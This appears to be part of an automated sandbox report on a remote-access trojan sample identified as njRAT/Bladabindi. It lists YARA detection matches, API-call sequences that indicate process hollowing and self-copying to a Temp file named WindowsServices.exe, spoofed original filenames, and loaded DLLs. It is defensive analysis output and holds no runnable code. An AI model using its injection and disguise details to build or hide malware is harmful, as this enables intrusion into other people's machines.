        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,1_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 4_2_00B8AA46 NtQuerySystemInformation,4_2_00B8AA46
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 4_2_00B8AA15 NtQuerySystemInformation,4_2_00B8AA15
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 5_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,5_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 14_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,14_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 17_2_00B3AA46 NtQuerySystemInformation,17_2_00B3AA46
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 17_2_00B3AA15 NtQuerySystemInformation,17_2_00B3AA15
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 18_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,18_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 21_2_00D7AA46 NtQuerySystemInformation,21_2_00D7AA46
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 21_2_00D7AA15 NtQuerySystemInformation,21_2_00D7AA15
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 22_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,22_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 25_2_00E8AA46 NtQuerySystemInformation,25_2_00E8AA46
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 25_2_00E8AA15 NtQuerySystemInformation,25_2_00E8AA15
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_00405A101_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_0041064D1_2_0041064D
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_004137251_2_00413725
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 4_2_04D30CD84_2_04D30CD8
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 4_2_04D30CBE4_2_04D30CBE
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 5_2_00405A105_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 5_2_0041064D5_2_0041064D
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 5_2_004137255_2_00413725
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 14_2_00405A1014_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 14_2_0041064D14_2_0041064D
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 14_2_0041372514_2_00413725
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 18_2_00405A1018_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 18_2_0041064D18_2_0041064D
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 18_2_0041372518_2_00413725
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 22_2_00405A1022_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 22_2_0041064D22_2_0041064D
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 22_2_0041372522_2_00413725
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: String function: 00404850 appears 69 times
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: String function: 00404670 appears 69 times
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: String function: 00403E10 appears 116 times
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: String function: 004039C0 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: String function: 00404850 appears 276 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: String function: 00404360 appears 60 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: String function: 00404670 appears 276 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: String function: 00403E10 appears 464 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: String function: 004039C0 appears 464 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: String function: 00403C20 appears 80 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: String function: 004040F0 appears 60 times
        Source: iR2UtZj5vP.exe, 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFlowerPower.EXE vs iR2UtZj5vP.exe
        Source: iR2UtZj5vP.exe, 00000001.00000003.1338882973.0000000000632000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecaspol.exeT vs iR2UtZj5vP.exe
        Source: iR2UtZj5vP.exe, 00000001.00000000.1327046674.0000000000444000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFlowerPower.EXE vs iR2UtZj5vP.exe
        Source: iR2UtZj5vP.exe, 00000004.00000000.1338606357.0000000000444000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFlowerPower.EXE vs iR2UtZj5vP.exe
        Source: iR2UtZj5vP.exe, 00000004.00000002.1427053216.0000000003BCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFlowerPower.EXE vs iR2UtZj5vP.exe
        Source: iR2UtZj5vP.exeBinary or memory string: OriginalFilenameFlowerPower.EXE vs iR2UtZj5vP.exe
        Source: iR2UtZj5vP.exe.1.drBinary or memory string: OriginalFilenamecaspol.exeT vs iR2UtZj5vP.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: mfc42.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mfc42.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection loaded: fwpuclnt.dllJump to behavior
